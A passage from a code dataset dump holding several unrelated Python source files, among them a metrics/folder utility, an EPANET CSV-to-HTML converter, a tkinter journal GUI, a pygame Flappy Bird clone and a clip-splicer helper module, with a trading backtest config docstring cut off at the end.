\"\\\\test8\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test9\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n\r\n\r\ndef move_repos(path_train,path_dest):\r\n\r\n for folder in os.listdir(path_train):\r\n for file in os.listdir(path_train+\"//\"+folder):\r\n copy_tree(path_train+\"\\\\\"+folder+\"\\\\\"+file, path_dest+\"\\\\\"+file)\r\n\r\n\r\ndef extractNames(file_lang):\r\n\r\n f = open(file_lang, \"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n results = []\r\n result = []\r\n guessLangResults = f.readlines()\r\n for elem in guessLangResults:\r\n if(\"/\" in elem):\r\n result = []\r\n result.append(elem.rstrip())\r\n if(\"({\" in elem):\r\n index = elem.find(\"'\")+1\r\n findex = elem.find(\"'\", index)\r\n lang = elem[index:findex]\r\n\r\n if lang==\"C++\":\r\n 
lang=\"cpp\"\r\n            elif lang==\"C#\":\r\n                lang=\"csharp\"\r\n            result.append(lang.lower())\r\n\r\n\r\n            index = elem.find(\":\", findex)+2\r\n            findex = elem.find(\",\", index)\r\n            occor = elem[index:findex]\r\n            result.append(occor)\r\n            results.append(result)\r\n\r\n    print(results)\r\n    return results\r\n\r\n\r\n\r\ndef split_metrics(file_in, file_precision, file_recall, file_top):\r\n    f=open(file_in, \"r\")\r\n    out_precision=open(file_precision,\"w\")\r\n\r\n    for line in f:\r\n        if line.find(\"no\") != -1:\r\n            out_precision.write(line.strip() + \"\\n\")\r\n\r\n\r\n\r\n\r\ndef create_topics_folder(root,file_topic):\r\n    list_folders= open(file_topic,\"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n    print(root)\r\n    list_topic=\"C:\\\\Users\\\\claudio\\\\Desktop\\\\projects_new_dataset\\\\\"\r\n    for folder in os.listdir(root):\r\n        print(folder)\r\n        for f in os.listdir(list_topic):\r\n\r\n            try:\r\n                #print(\"no\")\r\n                os.mkdir(os.path.join(root,folder,str(f).strip()))\r\n            except:\r\n                print(\"already created\")\r\n# begin=\"C:\\\\Users\\\\claudio\\\\Desktop\\\\projects_100_readme_ConfB\\\\\"\r\n# begin2=\"C:\\\\Users\\claudio\\\\Desktop\\\\ten_folder_135\\\\\"\r\n# end=\"C:\\\\Users\\claudio\\\\Desktop\\\\ten_folder_135\\\\\"\r\n#\r\n# for topic in os.listdir(begin):\r\n#     for x in range(1, 11):\r\n#         print(x)\r\n#         copy_tree(begin, end+topic+\"\\\\train\"+str(x)+\"\\\\\")\r\n\r\n#split_metrics(\"C:\\\\Users\\\\claudio\\\\Desktop\\\\topics_134.txt\",\"left.txt\", \"recall_test2.csv\", \"top_test2.csv\")\r\n# for x in range(1,11):\r\n#     print(x)\r\n#     preprocess_names(\"C:\\\\Users\\\\claudio\\\\Desktop\\\\half_50\\\\test\"+str(x)+\"\\\\\",\"half_\"+str(x)+\".txt\")\r\n# #move_repos(\"D:\\\\crawledRepository\",\"D:\\\\MSR_repo\")\r\n#ultimate_ten_folder()\r\n\r\n# list_predicted = [\"3d\", \"unity\", \"game-engine\", \"aws\"]\r\n# guess_langs=[[\"usr/repo\",\"cpp\",49], [\"another/repo\", \"java\", 30]]\r\n# repo_to_guess=\"usr/repo\"\r\n# print(add_lang(guess_langs, repo_to_guess, list_predicted))\r\n#create_topics_folder(\"C:/Users/claudio/Desktop/half_50\", \"10_folder.txt\")\r\n#extractNames(\"results.txt\")","sub_path":"MNB_code/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":20576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"470666934","text":"import os\nimport csv\n\n__version__ = '0.2.1'\n\nHTML_PATH = '.\\\\nodes.html'\nCSV_FILES = '.\\\\EPANET_exports\\\\PMLD_nodes.xlsx'\n\nSP_INC = 2 #no of spaces to increment by\n\ndef create_row(row_data, **kwargs):\n    sp = ' ' * kwargs.get('line_space', 0) #leading spaces\n    output = sp + '<tr>\\n'\n    sp += SP_INC * ' ' #increase lead spacing\n\n    if kwargs.get('is_header', False):\n        for item in row_data:\n            output += sp + '<th>' + item + '</th>\\n'\n    else:\n        first_col = row_data[0].split(' ', 1) #first word of first column is bold\n        output += sp + '<td><b>' + first_col[0] + '</b> ' + first_col[1] + '</td>\\n'\n        for item in row_data[1:]:\n            output += sp + '<td>' + item + '</td>\\n'\n\n    sp = sp[:-SP_INC] #dec lead spacing\n    return output + sp + '</tr>\\n'\n\n\ndef create_table(table_data, **kwargs): #create table from list of lists\n    border = str(kwargs.get('border', 0))\n    cellspacing = str(kwargs.get('cellspacing', 0))\n    cellpadding = str(kwargs.get('cellpadding', 0))\n    sp = ' ' * kwargs.get('line_space', 0) #leading spaces\n    output = sp + '<table border=\"' + border + '\" cellspacing=\"' + cellspacing + '\" cellpadding=\"' + cellpadding + '\">\\n'\n    sp += SP_INC * ' ' #increase lead spacing\n\n    output += create_row(table_data[0], line_space = len(sp), is_header = True) #first row is a header\n    for row_data in table_data[1:]: 
#remaining rows are data\n        output += create_row(row_data, line_space = len(sp))\n\n    sp = sp[:-SP_INC] #decrease lead spacing\n    return output + sp + '</table>
\\n'\n\n\ndef insert_csv (html_path, csv_paths):\n    html_orig = open(html_path)\n    html_halves = html_orig.read().split('</table>')\n    sp = (len(html_halves[0]) - len(html_halves[0].rstrip(' '))) #number of spaces before ending table tag\n\n    new_tables = ''\n    for path in csv_paths:\n        print('Building table for ' + path)\n        file = open(path, 'r')\n        csv_data = list(csv.reader(file, delimiter=','))\n        new_tables += create_table(csv_data, line_space = sp + 2)\n\n    print('Inserting tables into copy of ' + html_path)\n    output_html = html_halves[0].rstrip(' ') + new_tables + (sp * ' ') + '</table>' + html_halves[1]\n    output_path = os.path.dirname(html_path) + '\\\\output.htm'\n    print('Saving result to ' + output_path)\n    output_file = open(output_path, 'w')\n    output_file.write(output_html)\n\nif __name__ == \"__main__\": insert_csv(HTML_PATH, CSV_FILES)","sub_path":"Epanet Files/EPANET_csv_file_reader.py","file_name":"EPANET_csv_file_reader.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"603823526","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 9 16:02:20 2016\r\n\r\n@author: Kozmik\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nfrom tkinter.ttk import *\r\nimport tkinter.messagebox as messagebox\r\nfrom datetime import datetime\r\nfrom typing import TypeVar, Generic\r\n\r\nEntryFrame = TypeVar('EntryFrame')\r\n\r\nclass EntryFrame:\r\n    def __init__(self, master):\r\n        self.main = Frame(master)\r\n#        style = ttk.Style()\r\n#        style.configure()\r\n        self.scrollbar = Scrollbar(self.main)\r\n        self.body_box = Text(self.main, yscrollcommand=self.scrollbar.set, wrap=WORD)\r\n        self.scrollbar.config(command=self.body_box.yview)\r\n        self.body_box.grid(row=4, column=2, rowspan=11, columnspan=29, sticky = NSEW, pady=3)\r\n        self.scrollbar.grid(row=4, column=32, rowspan=11, sticky=NS)\r\n\r\n        self.tagslabel = Label(self.main, text=\"Tags:\", width=10, anchor=CENTER)\r\n        self.tagslabel.grid(row=16, column=8)\r\n        self.tags_box = Text(self.main, height=1)\r\n        self.tags_box.grid(row=16, column=10, columnspan=14, sticky=EW)\r\n\r\n        self.parentlabel = Label(self.main, text=\"Parent Entry:\", width=15, anchor=CENTER).grid(row=17, column=8)\r\n        self.parent_box = Text(self.main, height=1)\r\n        self.parent_box.grid(row=17, column=10, columnspan=8)\r\n\r\n    def update(self, body=None, tags=None, parent=None):\r\n        self.body_box.delete(\"1.0\", END)\r\n        self.tags_box.delete(\"1.0\", END)\r\n        self.parent_box.delete(\"1.0\", END)\r\n        if body:\r\n            self.body_box.insert(CURRENT, body)\r\n        if tags:\r\n            i = 1\r\n            sorted_tags = sorted(tags)\r\n            self.tags_box.insert(CURRENT, sorted_tags[0])\r\n            while i < len(sorted_tags):\r\n                self.tags_box.insert(CURRENT, ', ' + sorted_tags[i])\r\n                i+=1\r\n        if parent:\r\n            self.parent_box.insert(CURRENT, parent)\r\n    def getBodyBoxContents(self):\r\n        return self.body_box.get(\"1.0\", END)\r\n    def getTagsBoxContents(self):\r\n        return self.tags_box.get(\"1.0\", END)\r\n    def getParentBoxContents(self):\r\n        if self.parent_box.get(\"1.0\", END):\r\n            return self.parent_box.get(\"1.0\", END)\r\n        else:\r\n            return None\r\n\r\n    def CreateEntryFrame(self):\r\n        return self.main\r\n\r\nclass OptionsFrame:\r\n    def __init__(self, program, master, date, entry, journal):\r\n        self.main = Frame(master)\r\n        self.main_win = program\r\n        self.master = master\r\n        self.entry_obj = entry\r\n        self.journal_obj = journal\r\n        self.date_obj = date\r\n        self.win = None\r\n\r\n        self.SAVE = Button(self.main, text=\"Save\", 
command=self.Save).grid(row=0, column=0, columnspan=2)\r\n self.LINK = Button(self.main, text=\"Create Linked Entry\", command=self.NewLink).grid(row=0, column=2, columnspan=2, sticky=EW)\r\n self.NEW = Button(self.main, text=\"New Entry\", command=self.NewEntry).grid(row=0, column=4, columnspan=2)\r\n self.QUIT = Button(self.main, text=\"Quit\", command=self.Quit).grid(row=1, column=0, columnspan=2)\r\n self.LINKS = Button(self.main, text=\"Display Linked Entries\", command=self.DisplayLinks).grid(row=1, column=2, columnspan=2)\r\n self.DELETE = Button(self.main, text=\"Delete\", command=self.Delete).grid(row=1, column=4)\r\n \r\n \r\n def Save(self):\r\n b = self.entry_obj.getBodyBoxContents()\r\n t = self.entry_obj.getTagsBoxContents()\r\n p = self.entry_obj.getParentBoxContents()\r\n d = 0\r\n if self.date_obj.get():\r\n d = self.date_obj.getDateProgramFormat()\r\n else:\r\n self.date_obj.updateDateDisplay()\r\n d = self.date_obj.getDateProgramFormat()\r\n self.journal_obj.add(d, b, t, p)\r\n if self.win:\r\n self.win.destroy()\r\n self.date_obj.addToFilterDict(self.journal_obj.getTags(self.date_obj.getDateProgramFormat()))\r\n self.date_obj.addToDateRegistry(self.date_obj.getDateProgramFormat())\r\n self.date_obj.addToCombobox(self.date_obj.getDateUserFormat())\r\n def NewLink(self):\r\n if self.date_obj.get():\r\n self.checkSaved()\r\n self.entry_obj.update(None, None, self.date_obj.getDateProgramFormat())\r\n self.date_obj.clear()\r\n else:\r\n messagebox.showinfo(\"Link Entry\", \"There is no entry to link from.\")\r\n def NewEntry(self):\r\n self.checkSaved()\r\n self.date_obj.clear()\r\n self.entry_obj.update()\r\n def DisplayLinks(self):\r\n self.journal_obj.getGraph()\r\n def Delete(self):\r\n selection = messagebox.askyesno(\"Delete Entry\", \"Delete this entry?\")\r\n if selection:\r\n self.entry_obj.update()\r\n self.date_obj.removeFromFilterDict(self.journal_obj.getTags(self.date_obj.getDateProgramFormat()))\r\n self.date_obj.removeFromDateRegistry(self.date_obj.getDateProgramFormat())\r\n self.date_obj.removeFromCombobox(self.date_obj.getDateUserFormat())\r\n self.journal_obj.delete(self.date_obj.getDateProgramFormat())\r\n self.date_obj.clear()\r\n def Quit(self):\r\n self.main_win.Destroy()\r\n \r\n \r\n def checkSaved(self):\r\n if self.entry_obj.getBodyBoxContents().strip():\r\n try:\r\n parent = 0 \r\n if self.entry_obj.getParentBoxContents():\r\n parent = self.entry_obj.getParentBoxContents()\r\n else:\r\n parent = None\r\n d = self.date_obj.getDateProgramFormat()\r\n if self.entry_obj.getBodyBoxContents().strip() != self.journal_obj.getBody(d).strip() \\\r\n or self.entry_obj.getTagsBoxContents().strip().split(', ') != sorted(self.journal_obj.getTags(d))\\\r\n or parent != self.journal_obj.getParent(d):\r\n self.throwSaveWarning()\r\n except KeyError:\r\n self.throwSaveWarning()\r\n \r\n def throwSaveWarning(self):\r\n selection = messagebox.askyesno(\"Save Entry\", \"Save before continuing?\")\r\n if selection:\r\n self.Save()\r\n \r\n def CreateOptionsFrame(self):\r\n return self.main\r\n \r\nclass DateFrame():\r\n def __init__(self, master, journal, entry):\r\n self.main = Frame(master)\r\n self.master = master\r\n self.journal_obj = journal\r\n self.entry_obj = entry\r\n \r\n self.date_userformat = \"\"\r\n self.date_programformat = 0\r\n \r\n self.registry = {}\r\n self.MONTHS = {\"01\":\"Jan\", \"02\":\"Feb\", \"03\":\"Mar\", \"04\":\"Apr\", \"05\":\"May\", \"06\":\"Jun\", \"07\":\"Jul\", \"08\":\"Aug\", \"09\":\"Sep\", \"10\":\"Oct\", \"11\":\"Nov\", 
\"12\":\"Dec\"}\r\n self.UpdateDateRegistry()\r\n \r\n self.date = Combobox(self.main, postcommand=self.updateCombobox)\r\n self.date.bind(\"<>\", self.Update)\r\n self.date.grid(row=0, column=8, columnspan=10)\r\n self.combo_list = []\r\n for key in sorted(self.registry):\r\n self.combo_list.append(self.registry[key])\r\n \r\n FILTER = Button(self.main, text=\"Filter\", command=self.showFilters).grid(row=0, column=18)\r\n self.filter_dict = dict()\r\n for key in self.journal_obj.getDictKeys():\r\n for tag in self.journal_obj.getTags(key):\r\n if tag not in self.filter_dict:\r\n self.filter_dict[tag] = 1\r\n elif tag in self.filter_dict:\r\n self.filter_dict[tag] += 1\r\n self.filter_tracker = []\r\n for item in sorted(list(self.filter_dict.keys())):\r\n self.filter_tracker.append([item, BooleanVar(value=True, name=item), None])\r\n self.search_type = StringVar(name=\"Search Type\", value=\"OR\")\r\n self.filter_window = ''\r\n \r\n def Update(self, event):\r\n self.date_userformat = self.date.get()\r\n self.date_programformat = list(self.registry.keys())[list(self.registry.values()).index(self.date_userformat)]\r\n body = self.journal_obj.getBody(self.date_programformat)\r\n tags = self.journal_obj.getTags(self.date_programformat)\r\n parent = self.journal_obj.getParent(self.date_programformat)\r\n self.entry_obj.update(body, tags, parent)\r\n def getDateUserFormat(self):\r\n return self.date_userformat\r\n def getDateProgramFormat(self):\r\n return self.date_programformat\r\n def getCurrentDate(self): #Program format\r\n date=datetime.today()\r\n return int(datetime.strftime(date, '%Y%m%d%H%M%S'))\r\n def get(self):\r\n return self.date.get()\r\n def ConvertToUserFormat(self, date):\r\n if date != '':\r\n datestr = ''\r\n datestr = date[6:8] + ' ' + self.MONTHS[date[4:6]] + ' ' + date[:4] + ', ' + date[8:]\r\n return datestr\r\n \r\n \r\n def UpdateDateRegistry(self):\r\n self.registry = {}\r\n for item in self.journal_obj.getDictKeys():\r\n self.registry[item] = self.ConvertToUserFormat(str(item))\r\n def addToDateRegistry(self, key):\r\n self.registry[key] = self.ConvertToUserFormat(str(key))\r\n def removeFromDateRegistry(self, key):\r\n del self.registry[key]\r\n \r\n \r\n def updateCombobox(self):\r\n self.clear()\r\n self.implementFilters()\r\n self.date['values'] = self.combo_list\r\n def addToCombobox(self, value):\r\n if value not in self.combo_list:\r\n self.combo_list.append(value)\r\n def removeFromCombobox(self, value):\r\n if value in self.combo_list:\r\n self.combo_list.remove(value)\r\n def updateDateDisplay(self):\r\n self.date_programformat = self.getCurrentDate()\r\n self.date_userformat = self.ConvertToUserFormat(str(self.date_programformat))\r\n self.date.set(self.date_userformat)\r\n def clear(self):\r\n self.date.set('')\r\n self.date_programformat = 0\r\n self.date_userformat = ''\r\n \r\n \r\n def addToFilterDict(self, tags):\r\n for tag in tags:\r\n if tag not in self.filter_dict:\r\n self.filter_dict[tag] = 1\r\n elif tag in self.filter_dict:\r\n self.filter_dict[tag] += 1\r\n def removeFromFilterDict(self, tags):\r\n for tag in tags:\r\n if self.filter_dict[tag] != 0:\r\n self.filter_dict[tag] -= 1\r\n def getFilterDict(self):\r\n return self.filter_dict\r\n def getFilterTracker(self):\r\n return self.filter_tracker\r\n def getFilterSearchVar(self):\r\n return self.search_type\r\n def setFilterSearchType(self, string):\r\n self.search_type.set(string)\r\n def showFilters(self):\r\n win = self.createFilterDialog() \r\n def implementFilters(self):\r\n 
filtered_tags = []\r\n if self.search_type.get() == 'AND':\r\n self.combo_list = []\r\n for key in sorted(self.registry):\r\n self.combo_list.append(self.registry[key])\r\n for item in self.filter_tracker:\r\n if item[1].get() == False:\r\n filtered_tags.append(item[0])\r\n for key in sorted(self.journal_obj.getDictKeys()):\r\n for tag in self.journal_obj.getTags(key):\r\n if tag in filtered_tags:\r\n self.removeFromCombobox(self.ConvertToUserFormat(str(key)))\r\n elif self.search_type.get() == 'OR':\r\n self.combo_list = []\r\n for item in self.filter_tracker:\r\n if item[1].get() == True:\r\n filtered_tags.append(item[0]) \r\n for key in sorted(self.journal_obj.getDictKeys()):\r\n for tag in self.journal_obj.getTags(key):\r\n if tag in filtered_tags:\r\n self.addToCombobox(self.ConvertToUserFormat(str(key)))\r\n \r\n \r\n def createFilterDialog(self):\r\n main = Toplevel()\r\n top = Frame(main)\r\n middle = Frame(main)\r\n bottom = Frame(main)\r\n \r\n scrollbar = Scrollbar(middle)\r\n cb_canvas = Canvas(middle, highlightthickness=0)\r\n main.title(\"Filters\")\r\n filter_list = self.getFilterTracker().copy()\r\n for item in filter_list:\r\n item[2] = (Checkbutton(cb_canvas, text=item[0], onvalue=True, offvalue=False, variable=item[1]))\r\n ANDTYPE = Radiobutton(top, text=\"AND\", value=\"AND\", variable=self.getFilterSearchVar())\r\n ANDTYPE.grid(row=0, column=0, sticky=W)\r\n ORTYPE = Radiobutton(top, text=\"OR\", value=\"OR\", variable=self.getFilterSearchVar())\r\n ORTYPE.grid(row=0, column=1, sticky=W)\r\n item = 0\r\n row = 10\r\n col = 0\r\n while item < len(filter_list):\r\n for i in range(0, row):\r\n try:\r\n filter_list[item][2].grid(row=i, column=col, sticky=W)\r\n item+=1\r\n except IndexError:\r\n break\r\n col+=1\r\n cb_canvas.grid(row=1, column=0, rowspan=10, columnspan=2)\r\n ALL = Button(bottom, text=\"All\", command=lambda:self.selectAllCheckboxes(filter_list))\r\n NONE = Button(bottom, text=\"None\", command=lambda:self.deselectAllCheckboxes(filter_list))\r\n ALL.grid(row=2, column=0, sticky=W)\r\n NONE.grid(row=2, column=1, sticky=E)\r\n top.pack(side=TOP)\r\n middle.pack(side=TOP)\r\n bottom.pack(side=TOP)\r\n main.grab_set()\r\n return main\r\n \r\n def selectAllCheckboxes(self, filter_list):\r\n for i in range(0, len(filter_list)):\r\n filter_list[i][1].set(True)\r\n def deselectAllCheckboxes(self, filter_list):\r\n for i in range(0, len(filter_list)):\r\n filter_list[i][1].set(False)\r\n \r\n def CreateDateFrame(self):\r\n return self.main\r\n \r\nclass Dialog:\r\n def __init__(self, parent=None):\r\n self.parent_obj = parent\r\n \r\n def throwSaveWarning(self):\r\n main = Toplevel()\r\n main.title(\"Warning!\")\r\n message = Message(main, text=\"Save before continuing?\", anchor=CENTER).grid(row=0, column=1)\r\n SAVE = Button(main, text=\"Save\", command=self.parent_obj.Save)\r\n SAVE.grid(row=1, column=0, columnspan=2)\r\n DONTSAVE = Button(main, text=\"Don't Save\", command=main.destroy)\r\n DONTSAVE.grid(row=1, column=2, columnspan=2)\r\n return main \r\n def throwDeleteWarning(self):\r\n main = Toplevel()\r\n main.title(\"Warning\")\r\n message = Message(main, text=\"Are you sure you want to delete this entry?\").grid(row=0, column=1, columnspan=2, sticky=EW)\r\n DELETE = Button(main, text=\"Yes\", command=self.parent_obj.Delete).grid(row=1, column=0, columnspan=2, sticky=E)\r\n DONTDELETE = Button(main, text=\"No\", command=main.destroy).grid(row=1, column=2, columnspan=2, sticky=W)\r\n return main\r\n def createFilterDialog(self):\r\n main = Toplevel()\r\n 
top = Frame(main)\r\n middle = Frame(main)\r\n bottom = Frame(main)\r\n \r\n scrollbar = Scrollbar(middle)\r\n cb_canvas = Canvas(middle)\r\n main.title(\"Filters\")\r\n filter_list = self.parent_obj.getFilterTracker().copy()\r\n for item in filter_list:\r\n item[2] = (Checkbutton(cb_canvas, text=item[0], onvalue=True, offvalue=False, variable=item[1]))\r\n ANDTYPE = Radiobutton(top, text=\"AND\", value=\"AND\", variable=self.parent_obj.getFilterSearchVar())\r\n ANDTYPE.grid(row=0, column=0, sticky=W)\r\n ORTYPE = Radiobutton(top, text=\"OR\", value=\"OR\", variable=self.parent_obj.getFilterSearchVar())\r\n ORTYPE.grid(row=0, column=1, sticky=W)\r\n item = 0\r\n row = 10\r\n col = 0\r\n while item < len(filter_list):\r\n for i in range(0, row):\r\n try:\r\n filter_list[item][2].grid(row=i, column=col, sticky=W)\r\n item+=1\r\n except IndexError:\r\n break\r\n col+=1\r\n cb_canvas.grid(row=1, column=0, rowspan=10, columnspan=2)\r\n ALL = Button(bottom, text=\"All\", command=lambda:self.selectAllCheckboxes(filter_list))\r\n NONE = Button(bottom, text=\"None\", command=lambda:self.deselectAllCheckboxes(filter_list))\r\n ALL.grid(row=2, column=0, sticky=W)\r\n NONE.grid(row=2, column=1, sticky=E)\r\n top.pack(side=TOP)\r\n middle.pack(side=TOP)\r\n bottom.pack(side=TOP)\r\n return main\r\n \r\n def selectAllCheckboxes(self, filter_list):\r\n for i in range(0, len(filter_list)):\r\n filter_list[i][1].set(True)\r\n def deselectAllCheckboxes(self, filter_list):\r\n for i in range(0, len(filter_list)):\r\n filter_list[i][1].set(False)\r\n \r\n ","sub_path":"JournalWidgets.py","file_name":"JournalWidgets.py","file_ext":"py","file_size_in_byte":16855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"46769740","text":"# CS320 Programming Language\n# Author: Joe Do & Stuart Larsen\n# Date: Feb 26, 2018\n# The purpose of this program is to create a clone of the Flappy Bird game\n\nimport pygame\nimport random\nimport time\n\n# initiate pygame module\npygame.init()\n\n# set text color\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\n\n# set width and height for the game\ndisplay_width = 288\ndisplay_height = 512\nbird_height = 24\nbase_height = 112\npipe_height = 320\n\ngameDisplay = pygame.display.set_mode((display_width, display_height))\npygame.display.set_caption('Flappy Bird Clone')\nclock = pygame.time.Clock()\n\n# load all the graphics and sound here\nstartScreen = pygame.image.load('assets/images/message1.png')\nbirdImage = pygame.image.load('assets/images/redbird-upflap.png')\npipeImage = pygame.image.load('assets/images/pipe-red.png')\nbg = pygame.image.load('assets/images/background-night.png')\nbase = pygame.image.load('assets/images/base.png')\ngameover = pygame.image.load('assets/images/gameover.png')\nsoundWing = pygame.mixer.Sound('assets/audio/wing.wav')\nsoundHit = pygame.mixer.Sound('assets/audio/hit.wav')\nsoundDie = pygame.mixer.Sound('assets/audio/die.ogg')\nsoundPoint = pygame.mixer.Sound('assets/audio/point.ogg')\nsoundWin = pygame.mixer.Sound('assets/audio/point.wav')\n\n# Flip the pipe over\npipeInvert = pygame.transform.rotate(pipeImage,180)\n\n# bird function to display the bird\ndef bird(x, y):\n gameDisplay.blit(birdImage, (x, y)) # blit bird image in x and y coordinates\n\n# move base accorss the screen\ndef base_move(baseStartX):\n baseEndX = baseStartX % base.get_rect().width\n gameDisplay.blit(base,(baseEndX - base.get_rect().width, display_height - 112))\n if baseEndX < display_width:\n 
gameDisplay.blit(base, (baseEndX, display_height - 112))\n\n# this function will print out the score\ndef passedPipe(count):\n    font = pygame.font.SysFont(None, 25)\n    text = font.render(\"Score: \" + str(count), True, white)\n    gameDisplay.blit(text, (0, 0))\n\n# Display the bottom pipe\ndef bottomPipe(xCoordinate, yCoordinate):\n    gameDisplay.blit(pipeImage, (xCoordinate, yCoordinate))\n\n# Display the top pipe\ndef topPipe(xCoordinate, yCoordinate):\n    gameDisplay.blit(pipeInvert, (xCoordinate, yCoordinate))\n\n# Keep the game going after bird crashed\ndef crash():\n    game_loop()\n\n# display start screen at start of game, and when player loses\ndef game_intro():\n    startInitialized = False\n    while not startInitialized:\n        gameDisplay.blit(bg, (0, 0))\n        gameDisplay.blit(startScreen,(55,80))\n        gameDisplay.blit(base,(0, display_height - 112))\n        pygame.display.update()\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                pygame.quit()\n                quit()\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_b:\n                    startInitialized = True\n\n# this is the main game loop\ndef game_loop():\n    birdX = display_width / 3\n    birdY = (display_height - base_height) / 2\n    birdMove = 0\n    pipeStartX = display_width + 100\n    pipeBottomY = 250\n    pipeTopY = -170\n    pipe_speed = 4\n    passed = 0\n    baseStartX = 0\n\n    game_intro()\n\n    # when crashed is true, quit the game\n    gameExit = False\n    while not gameExit:\n        for event in pygame.event.get(): # event-handling loop\n            if event.type == pygame.QUIT:\n                pygame.quit()\n                quit()\n\n            if event.type == pygame.KEYDOWN: # this event happens when a key is pressed\n                if event.key == pygame.K_SPACE: # press spacebar to jump\n                    soundWing.play()\n                    birdMove = -4\n\n            if event.type == pygame.KEYUP: # this event happens when a key is released\n                if event.key == pygame.K_SPACE:\n                    birdMove = 2\n\n        birdY += birdMove\n        gameDisplay.blit(bg, (0, 0)) # draw background\n\n        # draw the bottom pipe\n        bottomPipe(pipeStartX, pipeBottomY)\n\n        #calls base_move to display the base image\n        base_move(baseStartX)\n        #updates base image x to make it look like it's moving\n        baseStartX -= 2\n\n        bird(birdX, birdY) # draw bird\n\n        # draw the top pipe\n        topPipe(pipeStartX, pipeTopY)\n\n        pipeStartX -= pipe_speed # make the pipes move left four pixels at a time\n\n        # update score when bird passed a pipe\n        if birdX == pipeStartX + 52:\n            soundWin.play()\n            passed += 1\n\n        passedPipe(passed)\n\n        # When bird hits the base, it will crash\n        if birdY > display_height - bird_height - base_height:\n            soundDie.play()\n            time.sleep(2)\n            crash()\n\n        # bird crashes when it hits any pipe\n        if birdX + 25 > pipeStartX and birdX - 50 < pipeStartX:\n            if birdX + 25 > pipeStartX and (birdY < pipeTopY + pipe_height or birdY + 24 > pipeBottomY):\n                soundHit.play()\n                time.sleep(2)\n                crash()\n\n        # moving pipes across the screen\n        if pipeStartX < -50:\n            pipeStartX = display_width\n\n            # make pipes change y coordinate randomly\n            pipeTopY = random.randint(-200, -40)\n            pipeBottomY = pipe_height + 100 + pipeTopY\n\n        pygame.display.update()\n        clock.tick(60)\n\ngame_loop()\npygame.quit()\nquit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"95965525","text":"#! 
/usr/local/bin/python3\n# coding=utf-8\n\"\"\"A utility module for beaunus_clip_splicer.\n\"\"\"\n\nTRACK_INDEX = None\n\n\ndef make_generic_dict(args):\n \"\"\"Given a list of arguments, returns a dictionary with each\n argument as a properties in the dictionary.\n\n Args:\n args: A list of arguments that will become properties in the\n dictionary.\n\n Returns:\n A dictionary containing all the data in the arguments.\n \"\"\"\n result = dict()\n for key in args:\n if args[key]:\n result[key] = args[key]\n return result\n\n\n# pylint: disable=unused-argument\ndef make_media_item(name=None, track=None, filename=None, length=None,\n mute=False):\n \"\"\"Returns a dictionary that represents a media item.\n\n Args:\n name: The name of the media item.\n track: The track that the media item should appear on.\n filename: The file that should be loaded into the media item.\n length: The length of the media item.\n mute: Whether or not to mute the media item.\n\n Returns:\n A dictionary that represents the media item.\n \"\"\"\n result = make_generic_dict(locals())\n result['type'] = 'MEDIA ITEM'\n return result\n\n\n# pylint: disable=unused-argument\ndef make_region(name=None, track=None, path=None, components=None):\n \"\"\"Returns a dictionary that represents a region.\n\n Args:\n name: The name of the region.\n track: The track that all children should appear on.\n path: The path that all children's files exist in.\n components: The components that should be loaded into the region.\n\n Returns:\n A dictionary that represents the region.\n \"\"\"\n result = make_generic_dict(locals())\n result['type'] = 'REGION'\n if not components:\n result['components'] = list()\n return result\n\n\n# pylint: disable=global-statement\ndef make_track(name, pre_track_pause_length=None):\n \"\"\"Returns a new track. If a pre_track_pause_length is specified,\n an empty track of that length is added to the track's component list.\n\n Args:\n name: The name of the track.\n\n Returns:\n A dictionary that represents a track.\n \"\"\"\n global TRACK_INDEX\n if TRACK_INDEX is None:\n TRACK_INDEX = 1\n\n track_name = 'Track ' + str(TRACK_INDEX).zfill(2) + ' - ' + name\n result = make_region(track_name)\n TRACK_INDEX += 1\n if pre_track_pause_length:\n result['components'].append(\n make_media_item(\n 'PAUSE at beginning of track',\n 'PAUSES',\n length=pre_track_pause_length))\n\n return result\n","sub_path":"Various/beaunus_clip_splicer/beaunus_clip_splicer_tools.py","file_name":"beaunus_clip_splicer_tools.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"404901894","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n#############################################################\nSIMULATION CONFIGURATION FILE\n#############################################################\nThis file contains all the header informations necessary to \ninitialize a backtest. \n\nPlease, read carefully all the explanations and report any \nbugs found in this file. \n\"\"\"\n\n\"\"\" \n===============================================================================\nMODULE IMPORTATION STEP\n===============================================================================\nThis step is dedicated to specify the path at which the Q26 BackTester module \nis stored on your machine and to import the different important objects : \n - SYMBOL : This object correponds to the \"broker\" identity of \n the symbol to be backtested. 
